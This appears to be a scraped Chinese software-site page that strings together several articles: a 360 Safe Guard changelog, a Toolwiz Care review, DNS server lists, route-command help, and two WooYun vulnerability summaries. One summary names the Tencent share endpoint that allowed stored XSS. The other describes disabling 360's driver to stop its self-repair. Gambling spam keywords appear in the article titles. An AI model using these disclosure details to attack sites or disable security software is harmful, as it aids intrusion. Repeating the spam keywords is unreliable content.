还在为一个一个的打开程序而烦恼吗?<br /><br />  现在,有了开机任务一键帮您轻松搞定!<br /><br />  今后,开机后想干啥!就干啥!!<br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/550_500/2f/02/02/2f02022q2746.56a5ef.png" /><br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/850_600/2b/02/02/2b02024q280c.9fbcd8.png" /><br /><br />  <strong>【软件管家】</strong><br /><br />  1、改进手机必备选择框,文字提示更加易懂;<br /><br />  2、优化手机必备下载问题;<br /><br />  3、不常用软件新增忽略功能,对不想提示软件可以设置不再提醒。<br /><br />  <strong>【系统修复】</strong><br /><br />  1、增强QQ面板上的链接打不开的修复;<br /><br />  2、新增开机登录窗口无法关闭系统的修复。<br /><br />  <strong>【360省电助手】</strong><br /><br />  &#8226;帮您减少10%-15%的电费开支<br /><br />  &#8226;帮您更方便快捷的调整显示器亮度(需要硬件支持)<br /><br />  &#8226;实时展现省电度数,精确到小数点后5位,点滴努力看得见<br /><br />  &#8226;轻松关闭不常用的硬件,既省电又能更延长硬件的寿命<br /><br />  &#8226;特有的离开模式,让你在挂游戏或者通宵下载时更省电<br /><br />  &#8226;通过减少电脑的电能消耗,从而减少全球发电能源的消耗<br /><br />  <strong>注</strong>:安装完后需重启电脑以便新功能生效。<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809390926756.jpg" /><br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809390943582.jpg" /><br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391016857.jpg" /><br /><br /><br />  <strong>【360密码安全鉴定器】</strong><br /><br />  担心自己密码被猜到?赶紧试试360密码安全鉴定器,看看您的密码是否安全。<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391145955.jpg" /><br /><br />  <br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391179606.jpg" /><br /><br />  提示:<br /><br />  1.本软件仅在本地检测密码强度,不会上传或保留任何检测痕迹,确保您输入的信息不会泄露。<br /><br />  2.密码强度得分不设100分,最高分为95分。因为密码强弱只是影响帐号安全的一个因素,黑客盗号还可能通过木马、钓鱼网站,甚至直接攻击网站服务器,窃取用户帐号密码数据。在这些情况下,再强的密码也无法避免失窃的风险。为电脑做好安全防护措施,分级管理密码、定期更换密码,才是全面保护帐号的有效措施。<br /><br />  <strong>【主程序:经验值等级】</strong><br /><br />  1、修正跨天经验值比例问题;<br /><br />  2、增加用户等级与任务设置。<br /><br />  <strong>【电脑清理】</strong><br /><br />  1、增加一键清理功能,让系统运行更有效率;<br /><br />  2、增加自动清理功能,自动帮您在空闲时间清理电脑中的垃圾和痕迹,让系统更加流畅。<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391128865.jpg" /><br /><br />  <strong>【360(91)手机助手安卓版】</strong><br /><br />  1、优化进程管理;<br /><br />  2、修正手机助手下载目录重复创建的问题;<br /><br />  3、优化了系统菜单设置界面。<br /><br />  <strong>【360寝室必备】</strong><br /><br />  看看寝室里谁在占网速?<br /><br />  是兄弟,就一起晒出自己的网速,合理使用寝室网络带宽。<br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/424_461/24/02/b2/2402b2eq24df.6c242c.png" /><br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/424_461/29/02/b4/2902b4eq24cb.2e882c.png" /><br /><br />  <strong>【360U盘鉴定器】</strong><br /><br />  如今,U盘、SD卡已经成为大家最经常使用的移动存储设备,然而各种小容量冒充大容量的缩水U盘也在市场上大肆猖獗。相关数据显示,每12个U盘中就有一个缩水U盘!这种缩水U盘在电脑上显示的也是虚假容量,极难发现。你手上的U盘是否“被缩水”了?近日,360安全卫士推出了一项U盘真实容量鉴定功能,就能彻底消除你的“被缩水”担心。<br /><br />  <strong>缩水U盘的危害</strong><br /><br />  部分人可能认为缩水U盘只是真实容量比标示容量小,也能使用。然而实际上缩水U盘的危害远不止这个,更严重的是不知不觉让您的重要数据丢失!请看下面这个案例:<br /><br />  北京的王先生前段时间在网上买了个16G的U盘。因为工作需要,他将很多数据表格、文档拷入U盘,这时一切正常。但是当他打开文件的时候,悲剧发生了:U盘里的全部文件已经损坏,无法打开。这些文件的丢失造成了工作延误,王先生年底的奖金肯定泡汤了。后来王先生找朋友帮忙检测,才发现所谓16G的U盘,实际容量只有128M。<br /><br />  <strong>准确识别各种缩水U盘</strong><br /><br />  下载360安全卫士最新版,在功能大全找到并打开“360U盘鉴定器”,插上您的U盘就能开始检测;<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391190559.jpg" /><br /><br />  耐心等待之后,不论造假技术多么高明的各种缩水的U盘都现身了:<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391122993.jpg" /><br /><br />  <strong>【新增:经验值等级】</strong><br /><br />  1、从现在起,使用安全卫士可以获得经验值啦!<br /><br />  2、Beta版第一批开放5个任务,包括打开安全卫士、保持在线、安全体检、一键优化、清理垃圾等。(点击查看详情 )<br /><br />  3、完成任务可获得经验值,每积累到一定经验值即可升级,更可获得代表等级的炫酷标志。(了解等级详情 )<br /><br />  4、达到一定等级后,将来可获得各种奖励和特权(即将开放)<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391145427.jpg" /><br /><br />  <strong>【系统修复】</strong><br /><br />  完善对于恶意开始菜单和桌面快捷键的扫描和处理。<br /><br />  <strong>【电脑门诊】</strong><br /><br />  1、新增任务栏位置发生变化的修复;<br /><br />  2、新增桌面上“我的电脑”图标消失后的修复。<br /><br />  3、增加对桌面和开始菜单里设置了可疑快捷方式的清除。<br /><br />  <strong>【360U盘防护】</strong><br /><br />  1、U盘防护增加对多分区U盘的支持;<br /><br />  2、U盘防护增加对移动硬盘的支持。<br /><br />  <strong>【360U盘防护】</strong><br /><br />  “赶时间,结果U盘弹出总是一遍又一遍失败,直接拔出又怕数据丢失,耽误事儿,真烦!”<br /><br />  “明明所有的文件都关掉了,为什么还是提示无法弹出U盘?”<br /><br />  “偶尔直接拔出,结果发现U盘就不识别了……送去维修,结果是U盘坏了,只能重新买,花了好多银子买的啊!!!”<br /><br />  “系统总是提示正在使用我的U盘,又不告诉我是哪些程序在使用,又不敢直接拔,这让我怎么办?”<br /><br />  “听说最近很多病毒、木马通过U盘传播,我插上U盘就有恐慌,不敢直接打开,怕啊!”<br /><br />  嘿嘿,还在苦恼么?那就赶紧来试试360U盘保镖吧*^-^*:<br /><br />  (1)桌面U盘快捷方式,打开U盘更快捷更清楚;<br /><br />  (2)U盘右键安全弹出,占用程序、被占用的文件一目了然,让您揪出偷偷占用U盘的“幕后黑手”;<br /><br />  (3)U盘弹出之前温馨的保存提醒,以免丢失正在编辑的文档;<br /><br />  (4)安全弹出U盘,不会对您的U盘和电脑造成任何损伤,从此不再夜夜担心小U“挂掉”;<br /><br />  (5)U盘插入后闪电云查杀,病毒、木马统统远离电脑,保护电脑、U盘安全。<br /><br />  <strong>温馨小提示:</strong><br /><br />  1、U盘防护目前仅支持WindowsXP/Vista/Windows732位系统下U盘无分区的情况,其他系统及多分区U盘目前正在努力支持中,敬请期待!:)<br /><br />  2、安装完后需<strong>重启电脑</strong>,新U盘防护功能才能生效。<br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/1000_650/22/02/f3/2202f33q22ed.df3de4.png" /><br /><br />  <strong>【邮件保镖-360首创邮件保护】</strong><br /><br />  防邮件钓鱼、防邮件恶意链接、防附件木马<br /><br />  支持网易163邮箱、QQ邮箱、Outlook等12种在线邮箱和邮件软件<br /><br />  “经常收到中奖邮件,点了邮件内的链接结果被骗,损失了好多钱?”<br /><br />  “附件打开后,莫名其妙就中了木马?”<br /><br />  “收到交友邮件,很感兴趣,点击后结果发现电脑越来越慢?”<br /><br />  “看到邮件内的东西很便宜,结果点了之后就开始弹出很多广告?”<br /><br />  “点了陌生人邮件里面的链接,主页被莫名其妙的换掉,而且还改不回来?”<br /><br />  “点了群发邮件里面的链接,结果就给我装了好多软件,还卸载不掉?“<br /><br />  以上问题是否困扰经常使用邮箱的您很久?<br /><br />  为此,360特强势推出360邮件保镖,全面保护邮箱安全!<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391219313.jpg" /><br /><br />  1、附件安全检测:智能监控附件木马、病毒威胁,加固入口防护;<br /><br />  2、邮件防欺诈:云端检测虚假链接或钓鱼网页,保护个人财产;<br /><br />  3、邮件防挂马:快速识别挂马链接和网页,强化邮箱安全。<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391247355.jpg" /><br /><br />  <strong>【局域网防护】</strong><br /><br />  宿舍、合租、无线上网时网速突然变慢,经常掉线,看网页时频繁中木马,很有可能是所在的局域网内发生了网络攻击。作为局域网、无线网这一重要安全入口,360升级了局域网防护(ARP防火墙3.0),新版强化了网关保护、ARP主动防御,能够主动抵御新的局域网攻击工具、木马的攻击。同时,局域网防护X64版本使用了系统底层兼容防护技术,开启时无需重启电脑,让您最快速体验到X64版局域网防护之强悍。新版功能如下,欢迎大家测试使用:<br /><br />  试用方法:360安全卫士——功能大全——流量防火墙——局域网防护<br /><br />  1、优化了自动绑定网关、ARP主动防御、IP冲突拦截、对外ARP攻击拦截等功能;<br /><br />  2、解决了部分用户无法开启局域网防护(ARP防火墙)的问题;<br /><br />  3、局域网防护设置更简单,防护项目一键开启;<br /><br />  4、局域网状态、防护状态、防护日志展现更直观,实时了解局域网内上网环境;<br /><br />  5、减少系统资源占用。<br /><br />  6、强力防御模式:可抵御任何局域网攻击,让号称“可突破任意ARP防火墙”的幻境网盾等软件们不再危害局域网,局域网上网更舒心;<br /><br />  7、局域网隐身模式:WinXP、2003系统下局域网隐身模式,让攻击者无法扫描到您的电脑,从而免受局域网攻击,局域网上网更放心。<br /><br />  <strong>【360云恢复】</strong><br /><br />  在使用电脑的过程中,随时可能出现死机、硬件损坏、系统崩溃需要重装等意外故障。<br /><br />  这些意外会导致上网账号,系统设置,常用软件等重要资料丢失。轻则耽误时间重新设置,重新安装软件,重则丢失上网账号无法上网,丢失收藏的网站等等。<br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/638_313/21/02/83/2102837q101f.cdb41e.png" /><br /><br />  360云恢复提供无限免费空间,为您可靠保存支持一键备份和恢复系统核心文件、IE首页、IE收藏夹、桌面壁纸、ADSL账号、Host设置、应用软件等重要数据。即便电脑遇到意外或者重装系统,也能快速将资料恢复,避免损失。<br /><br />  <strong>【功能大全——360闪电云鉴定器】</strong>(点击查看360闪电云鉴定器详细介绍 )<br /><br />  360闪电云鉴定器基于360安全中心独创的“云QVM”技术,能在极短时间内鉴定最新病毒,绝大部分文件甚至都不需要上传。运用领先的“云QVM”鉴定技术,仅需获取文件的微小信息点,就可鉴定最新病毒文件。无论病毒采用何种加壳、变形技术,都难逃云鉴定器的“闪电慧眼”。<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809391286615.jpg" /><br /><br />  <strong>【360任务管理器】</strong><br /><br />  1、帮助您详细了解和查看各系统进程、系统服务,让任务管理器更简单易懂;<br /><br />  2、帮助您便捷关闭各系统进程、系统服务,同时优化内存,加快电脑运行速度;<br /><br />  3、方便您实时掌握电脑资源利用状况,系统性能一目了然。<br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/680_605/28/02/02/280202eq965.a08d0f.png" /><br /></p> [安全产品]新加坡安全卫士Toolwiz Care评测-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/13647_1.html x-berry 安全产品 2011/12/1 9:10:34 <p>Toolwiz Care是新加坡Toolwiz团队开发的系统优化工具套装。类似于国内的360安全卫士,金山卫士或者QQ电脑管家。Toolwiz Care最近在国内算是比较热门的软件,也有读者曾经留言让我去体验一下,再加上网上一致的好评,促使我一探究竟。</p><p><img alt="" src="https://pic.cr173.com/up/2011-12/2011120109111513191.jpg" /></p><p><a href="http://www.pjyuanjian.com/soft/36371.html" target="_blank">Toolwiz Care</a>才刚刚起步,因此测试前我也不会对它期望过高,毕竟没有任何事物可以一飞登天。就国内的360安全卫士来,它也是积累了不少年月才有今天的成绩的,虽然我一直对它的好感不怎么样。</p><p>目前官方提供Toolwiz Care的下载链接只有Cnet网站的,这点希望官方日后能够提供多些下载地址。</p><p>Toolwiz Care的安装,笔者遇到了一个小问题,不知道是否是Windows 7 64位的缘故,Toolwiz Care会出现乱码。后来经过“高人”的指点,在系统分区根目录新建一个文件English.txt,重新运行软件就恢复正常了。</p><p>言归正传,笔者简单谈谈Toolwiz Care的界面、功能和操作。</p><p>首先是<a href="http://www.pjyuanjian.com/soft/36371.html" target="_blank">Toolwiz Care</a>的界面。有那么一点点弱,有点粗糙,不知道是否是初版的原因。建议官方重新设计UI,现在很多用户都重视软件的UI设计,不然你的功能再好,用户还是有可能非常不理智地使用一个功能不多不大,但UI设计的很精美的软件。</p><p><img alt="" src="https://pic.cr173.com/up/2011-12/2011120109111642815.jpg" /></p><p>其次是Toolwiz Care的功能。在功能上,Toolwiz Care还是很全面和强大的。如系统检测、系统清理,系统优化、安全中心,程序管理和工具箱,应有尽有。系统优化工具的功能大部分都如同一撤。不过Toolwiz Care最大的特色在它的工具箱,提供各种非常有用的小工具。如文件粉碎,磁盘擦除、重复文件查找和文件恢复;文件加密与解密,安全密码生成器,超级游戏加速;右键菜单管理,密码管理工具……这些小工具有时候真的非常必要。最难能可贵的是这么多的功能,Toolwiz Care的体积才不过3.5MB,正所谓麻雀虽小五脏俱全啊!</p><p><img alt="" src="https://pic.cr173.com/up/2011-12/2011120109111743870.jpg" /><br /><br /><br />新加坡安全卫士Toolwiz Care下载: <a href="http://www.pjyuanjian.com/soft/36371.html">http://www.pjyuanjian.com/soft/36371.html</a><br /><br />不过也有另笔者惋惜的地方,就是Toolwiz Care缺少木马查杀功能。木马查杀功能对于大部分电脑用户来说,像Toolwiz Care这样的工具不可少啊。期待日后的版本,会整合木马查杀那样的功能。</p><p>对于Toolwiz Care的操作,则没什么可评论的地方,中规中规的功能分类,用户很容易地找到自己需要的功能,有众多优化工具案例也参考,相信在用户体验上,Toolwiz Care做到优秀也不是什么难事。</p><p>写在最后,对于一款新兴的系统优化工具,Toolwiz Care能做到这个程度是值得人敬佩的。免费,体积小,功能全面……如果日后Toolwiz Care在各个方面做得更加完美,相信未来Toolwiz Care也将是优秀系统优化工具阵列的一员。</p> [病毒漏洞]腾讯分享功能导致腾讯朋友网等多处存储型XSS漏洞-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/13555_1.html WebSPRing 病毒漏洞 2011/11/19 9:39:22 <p><strong>漏洞概要 <br /></strong><br />缺陷编号: WooYun-2011-03335</p><p>漏洞标题: 腾讯朋友网存储型XSS漏洞 </p><p>相关厂商: 腾讯</p><p>漏洞作者: WebSPRing </p><p>提交时间: 2011-11-17</p><p>漏洞类型: xss跨站脚本攻击</p><p>危害等级: 高</p><p>自评Rank: 20</p><p>漏洞状态: 厂商已经确认<br /><br /><br /></p><p><strong>漏洞详情</strong></p><p>简要描述:</p><p>腾讯分享功能导致腾讯朋友网等多处存储型XSS漏洞。分享功能链接:http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=,该功能中的Summary字段在朋友网显示前没有进行编码过滤等安全操作,导致存储型XSS漏洞。</p><p>漏洞hash:b2f2835b68630cfc41ce5229787cf150<br /><br /></p><p><strong>漏洞回应</strong></p><p>厂商回应:</p><p>危害等级:高</p><p>漏洞Rank:20 </p><p>确认时间:2011-11-17</p><p>厂商回复:</p><p>非常感谢</p><p>最新状态:</p><p>暂无</p> [病毒漏洞]通过设备管理器“停用”360驱动可造成360无法自我修复-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/13554_1.html 不详 病毒漏洞 2011/11/19 9:30:04 <p><strong>漏洞概要<br /></strong><br />缺陷编号: WooYun-2011-03347</p><p>漏洞标题: 通过设备管理器“停用”360驱动可造成360无法自我修复 </p><p>相关厂商: 奇虎360</p><p>漏洞作者: zhq445078388 </p><p>提交时间: 2011-11-18</p><p>漏洞类型: 应用配置错误</p><p>危害等级: 低</p><p>自评Rank: 3</p><p>漏洞状态: 等待厂商处理<br /><br /><br /></p><p><strong>漏洞详情</strong></p><p>简要描述:</p><p>用设备管理器的驱动停用功能 可以绕过360的自我修复<br />造成一定程度的拒绝服务</p><p>漏洞hash:275517a19d0f47ba2b4241a922d1594b<br /><br /></p><p><strong>漏洞回应</strong></p><p>厂商回应:</p><p>暂无</p> [网络安全]全国电信及网通DNS列表(附国外开放DNS)-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/13495_1.html 佚名 网络安全 2011/11/9 9:50:06 <p> 西西今天突然上不起网了真见鬼,QQ可以上就是不能打开网页,</p><p>用 cmd PING <a href="http://www.baidu.com">www.baidu.com</a> 也无法P通 那因该是DNS出问题了,哥用的可是 谷歌的DNS呀难道也会出问题呀 果不然 换一个当地的DNS就可以打开网页了(远大的组国什么都有可能)</p><p>下面是西西小编整理的一系列DNS列表</p><p>先给大家两个开放式老外提供的的DNS吧</p><p>谷哥:&nbsp; <strong><span style="font-size:32px;"><span style="color:#ff0000;">8.8.8.8</span>&nbsp; <span style="color:#ff0000;">8.8.4.4</span></span></strong></p><p>OpenDNS: <span style="font-size:24px;color:#3366ff;"><strong>208.67.222.222 208.67.220.220</strong></span></p><h3><span style="color:#3333ff;">下面就是各省的DNS列表</span></h3><p>在使用之前最好在 cmd 下面Ping 一下这个dns看是否能P通.</p><p>北京DNS地址:<br />202.96.199.133<br />202.96.0.133<br />202.106.0.20<br />202.106.148.1<br />202.97.16.195<br />上海DNS地址:202.96.199.132<br />202.96.199.133<br />202.96.209.5<br />202.96.209.6<br />202.96.209.133<br />天津DNS地址:202.99.96.68<br />10.10.64.68<br />重庆DNS地址:61.128.128.68<br />10.150.0.1<br />61.128.192.4<br />广东DNS地址:202.96.128.143<br />202.96.128.68<br />202.96.128.110<br />深圳DNS地址:202.96.134.133<br />202.96.154.8<br />202.96.154.15<br />四川DNS地址:202.98.96.68<br />61.139.2.69<br />成都DNS地址:202.98.96.68<br />202.98.96.69<br />河南DNS地址:202.102.227.68<br />202.102.245.12<br />202.102.224.68<br />广西DNS地址:202.96.128.68<br />202.103.224.68<br />202.103.225.68<br />福建DNS地址:218.85.157.99<br />202.101.115.55<br />厦门DNS地址:202.101.103.55<br />202.101.103.54<br />湖南DNS地址:202.103.0.68<br />202.103.96.68<br />202.103.96.112<br />江苏DNS地址:202.102.15.162<br />202.102.29.3<br />202.102.3.141<br />202.102.24.35<br />陕西DNS地址:202.100.13.11<br />202.100.4.16<br />西安DNS地址:202.100.4.15<br />202.100.0.68<br />湖北DNS地址:202.103.0.68<br />202.103.0.117<br />202.103.24.68<br />山东DNS地址:202.102.154.3<br />202.102.152.3<br />202.102.128.68<br />202.102.134.68<br />浙江DNS地址:202.96.102.3<br />202.96.96.68<br />202.96.104.18<br />辽宁DNS地址:202.98.0.68<br />202.96.75.68<br />202.96.75.64<br />202.96.69.38<br />202.96.86.18<br />202.96.86.24<br />安徽DNS地址:202.102.192.68<br />202.102.199.68<br />10.89.64.5<br />河北DNS地址:202.99.160.68<br />10.17.128.90<br />保定DNS地址:202.99.160.68<br />202.99.166.4<br />吉林DNS地址:202.98.5.68<br />202.98.14.18<br />202.98.14.19<br />江西DNS地址:202.101.224.68<br />10.117.32.40<br />202.109.129.2<br />202.101.240.36<br />山西DNS地址:202.99.192.68<br />202.99.198.6<br />新疆DNS地址:61.128.99.133<br />61.128.99.134<br />贵州DNS地址:202.98.192.68<br />10.157.2.15<br />云南DNS地址:202.98.96.68<br />202.98.160.68<br />黑龙江DNS地址:202.97.229.133<br />202.97.224.68<br />内蒙古DNS地址:202.99.224.68<br />10.29.0.2<br />青海DNS地址:202.100.128.68<br />10.184.0.1<br />海南DNS地址:202.100.192.68<br />202.100.199.8<br />宁夏DNS地址:202.100.0.68<br />202.100.96.68<br />甘肃DNS地址:202.100.72.13<br />10.179.64.1<br />香港DNS地址:205.252.144.228<br />208.151.69.65<br />澳门DNS地址:202.175.3.8<br />202.175.3.3<br />网通<br /><br />省份/城市 DNS 名称 DNS IP ADDRESS <br />香港 ns1.netvigator.com 205.252.144.228 <br /><br />澳门 vassun2.macau.ctm.net 202.175.3.8 <br /><br />深圳 ns.shenzhen.gd.cn 202.96.134.133 202.96.154.8 202.96.154.15 <br /><br />北京 ns.bta.net.cn 202.96.0.133 <br />ns.spt.net.cn 202.96.199.133 <br />ns.cn.net 202.97.16.195 <br />202.106.0.20 <br />202.106.148.1 <br />202.106.196.115 <br /><br />广东 ns.guangzhou.gd.cn 202.96.128.143 <br />dns.guangzhou.gd.cn 202.96.128.68 <br /><br />上海 ns.sta.net.cn 202.96.199.132 <br />202.96.199.133 <br />202.96.209.5 <br />202.96.209.133 <br /><br />浙江 dns.zj.cninfo.net 202.96.102.3 <br />202.96.96.68 <br />202.96.104.18 <br /><br />陕西 ns.snnic.com 202.100.13.11 <br /><br />西安: 202.100.4.15 <br />202.100.0.68 <br /><br />天津 ns.tpt.net.cn 202.99.96.68 <br /><br />辽宁 ns.dcb.ln.cn 202.96.75.68 <br />202.96.75.64 <br />202.96.64.68 <br />202.96.69.38 <br />202.96.86.18 <br />202.96.86.24 <br /><br />江苏 pub.jsinfo.net 202.102.29.3 <br />202.102.13.141<br />202.102.24.35<br /><br />安徽:<br />202.102.192.68<br />202.102.199.68<br /><br /><br />四川 ns.sc.cninfo.net 61.139.2.69 <br /><br />重庆 61.128.128.68 <br />61.128.192.4 <br /><br />成都: 202.98.96.68 <br />202.98.96.69 <br /><br />河北 ns.hesjptt.net.cn 202.99.160.68 <br /><br />保定: 202.99.160.68 <br />202.99.166.4 <br /><br />山西 ns.sxyzptt.net.cn 202.99.198.6 <br /><br />吉林 ns.jlccptt.net.cn 202.98.5.68 <br /><br />山东 202.102.152.3 <br />202.102.128.68 <br /><br />福建 dns.fz.fj.cn 202.101.98.55 <br /><br />湖南 202.103.100.206 <br /><br />广西 10.138.128.40 <br />202.103.224.68 <br />202.103.225.68 <br /><br />江西 202.109.129.2 <br />202.101.224.68---j江西电信DNS <br />202.101.226.68---江西电信DNS <br />202.101.240.36 ---江西电信DNS ?<br /><br />云南 ns.ynkmptt.net.cn 202.98.160.68 <br /><br />河南: 202.102.227.68 <br />202.102.224.68 <br />202.102.245.12 <br /><br />新疆: 61.128.97.73 <br /><br />乌鲁木齐 61.128.97.73 <br />61.128.97.74 <br /><br />武汉: 202.103.24.68 <br />202.103.0.117 <br /><br />厦门两个 <br />202.101.103.55 <br />202.101.103.54 <br /><br />山东的: 202.102.134.68 <br /><br />长沙 <br />58.20.57.4 210.52.149.2<br /><br /><br />一些教育网内的----不一定好用 <br />202.203.128.33 cernet云南中心主dns <br />202.203.128.34 <br /><br />210.14.232.241 and 203.93.19.133 罗湖 <br />202.112.10.37 长安 <br />202.115.64.33 and 202.115.64.34 西南交大 <br />202.201.48.1 and 202.201.48.2 nwnu <br />210.33.116.112 浙江电大 <br />202.116.160.33 华南农业 <br />202.114.240.6 wust <br />202.194.48.130 ytnc <br />202.114.0.242 and 202.112.20.131 华中科大 <br />202.202.128.33 and 202.202.128.34 重庆医科大?西安交大? <br />202.112.0.33 and 202.112.0.34 cernet 华北网 <br />210.38.192.33 韶关<br /><br />全国各地VPI/VCI列表<br />地名 VPI VCI DNS 其它<br />北京 0 35 202.106.196.115 <br />天津 0 35 202.99.96.68 <br />广西 0 35 202.103.224.68, 202.103.225.68 <br />云南 0 35 61.166.150.101 <br />普洱 0 35 61.166.150.101, 61.166.15.170<br />兰州 0 32 <br />西安 8 35 <br />长春 8 35 <br />吉林市 0 39 202.98.0.68<br />0 38 202.98.5.68<br />哈尔滨 8 35<br />武汉 0 32 202.103.24.68<br />乌鲁木齐0 32 61.128.99.133, 61.128.99.134<br />顺德 8 81 202.96.128.68<br />广州 8 32 202.96.128.68, 202.96.128.110<br />8 35<br />中山 8 35<br />河源 8 81 202.96.128.143, 202.96.128.43<br />惠东 0 100 <br />东莞 8 35<br />从化 8 35 202.96.128.68<br />湛江 0 80<br />8 81<br />0 100 202.96.128.68, 202.96.128.143 <br />阳江 8 35 202.96.128.68, 202.96.135.133<br />南海 0 100 202.96.128.68, 202.96.134.133<br />江門 0 100 202.96.128.68 <br />汕尾 0 35<br />珠海 8 35<br />斗门 0 100 <br />汕头地区8 81 202.96.128.143, 202.96.128.68<br />汕头 0 35 <br />东莞 0 100<br />肈庆 8 81 61.140.7.67, 202.96.134.133<br />202.96.128.68,202.96.128.143 <br />佛山 8 35 202.96.128.68<br />惠州 0 100 <br />福清 0 200<br />揭阳 8 81 <br />秦皇岛 0 35 202.99.160.68, 202.99.166.4<br />浙江衢州8<br /><br />81 202.101.172.37, 202.96.104.18 <br />杭州 8 35 <br />0 32 202.101.172.35, 202.96.104.18<br />辽宁 0 35<br />抚顺铁通8 32 210.52.149.2, 211.98.2.4<br />202.96.64.68<br />10.0.1.254(固定IP)<br />河南安阳8 81 202.102.224.68, 202.102.227.68<br />濮阳 0 35 202.102.224.68, 202.102.227.68<br />驻马店 0 35 202.102.224.68<br />河南铁通0 35 211.98.192.3,202.102.224.68<br />山东枣庄8 81 <br />重庆 0 35<br />湖南 0 35 211.98.2.4<br />娄底 8 81 202.103.88.3, 202.103.100.100<br />贵州六盘水0 35 202.98.198.168<br />福建 0 200 202.101.98.55, 202.101.98.54<br />南平 0 35 202.101.115.55<br />厦门 8 35<br />福州 0 200 202.101.98.55<br />龙岩 0 35 202.101.113.55<br />三明 0 100 202.101.114.55 <br />安徽合肥0 35<br />0 32 <br />0 33 202.102.192.68 <br />中原油田8 81<br />河南焦作0 35 10.255.0.68, 202.102.227.68<br />上海 8 81 202.96.209.5, 202.96.209.133<br />福建福州0 200  202.101.98.55 <br /><br />广东珠海8 35 市区(含吉大、拱北、香洲、新香洲)、唐家、金鼎<br />0 100 南屏、西区</p><p>至于如何修改DNS大家看下面的图片吧.</p><p>西西用的是 Xp (还没用过win7) 哈.就以XP为例说明一下</p><p><img src="https://pic.cr173.com/up/2011-11/20111111990959362819.gif" alt="" /></p><p>先点桌面上的 网上邻居 右击点属性</p><p><img src="https://pic.cr173.com/up/2011-11/20111111991000098774.gif" alt="" /></p><p>然后在你的网卡上面右击点属性</p><p><img src="https://pic.cr173.com/up/2011-11/20111111991000246967.gif" alt="" /></p><p>然后双击一下 internet协议(tcp/ip) 就可以修改了上面红色部份就是了</p> [网络安全]多个IP选择线路的解决办法 route-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/13492_1.html 佚名 网络安全 2011/11/8 23:29:35 <p>一台电脑两条线路一个电信IP一个联通的IP,解决访问电信的时候自动走电信线路,访问联通的时候自动走联通的线路,我们可以用到下面这个命令</p><h2><span style="color:#ff0000;">ROUTE </span></h2><p>DOS命令我们都可以在 Cmd 下用 route /? 来查看他的帮助信息</p><p>先看一下他的帮助</p><p>Manipulates network routing tables.<br /><br /><span style="color:#ff0000;">ROUTE [-f] [-p] [command [destination]<br /></span>[MASK netmask] [gateway] [METRIC metric] [IF interface]<br /><br />-f Clears the routing tables of all gateway entries. If this is<br />used in conjunction with one of the commands, the tables are<br />cleared prior to running the command.<br />-p When used with the ADD command, makes a route persistent across<br />boots of the system. By default, routes are not preserved<br />when the system is restarted. Ignored for all other commands,<br />which always affect the appropriate persistent routes. This<br />option is not supported in Windows 95.<br />command One of these:<br />PRINT Prints a route<br />ADD Adds a route<br />DELETE Deletes a route<br />CHANGE Modifies an existing route<br />destination Specifies the host.<br />MASK Specifies that the next parameter is the 'netmask' value.<br />netmask Specifies a subnet mask value for this route entry.<br />If not specified, it defaults to 255.255.255.255.<br />gateway Specifies gateway.<br />interface the interface number for the specified route.<br />METRIC specifies the metric, ie. cost for the destination.<br /><br />All symbolic names used for destination are looked up in the network database<br />file NETWORKS. The symbolic names for gateway are looked up in the host name<br />database file HOSTS.<br /><br />If the command is PRINT or DELETE. Destination or gateway can be a wildcard,<br />(wildcard is specified as a star '*'), or the gateway argument may be omitted.<br /><br />If Dest contains a * or ?, it is treated as a shell pattern, and only<br />matching destination routes are printed. The '*' matches any string,<br />and '?' matches any one char. Examples: 157.*.1, 157.*, 127.*, *224*.<br />Diagnostic Notes:<br />Invalid MASK generates an error, that is when (DEST &amp; MASK) != DEST.<br />Example&gt; route ADD 157.0.0.0 MASK 155.0.0.0 157.55.80.1 IF 1<br />The route addition failed: The specified mask parameter is invalid<br />(Destination &amp; Mask) != Destination.<br /><br />Examples:<br /><br />&gt; route PRINT<br />&gt; route ADD 157.0.0.0 MASK 255.0.0.0 157.55.80.1 METRIC 3 IF 2<br />destination^ ^mask ^gateway metric^ ^<br />Interface^<br />If IF is not given, it tries to find the best interface for a given<br />gateway.<br />&gt; route PRINT<br />&gt; route PRINT 157* .... Only prints those matching 157*<br />&gt; route CHANGE 157.0.0.0 MASK 255.0.0.0 157.55.80.5 METRIC 2 IF 2<br /><br />CHANGE is used to modify gateway and/or metric only.<br />&gt; route PRINT<br />&gt; route DELETE 157.0.0.0<br />&gt; route PRINT</p><p>route - 显示 / 操作IP选路表<br /><br />总览 SYNOPSIS<br />route [-CFvnee]<br /><br />route [-v] [-A family] add [-net|-host] target [netmask Nm] [gw Gw] [metric N] [mss M] [window W] [irtt I][reject] [mod] [dyn] [reinstate] [[dev] If]<br /><br /><br />route [-v] [-A family] del [-net|-host] target [gw Gw][netmask Nm] [metric N] [[dev] If]<br /><br /><br />route 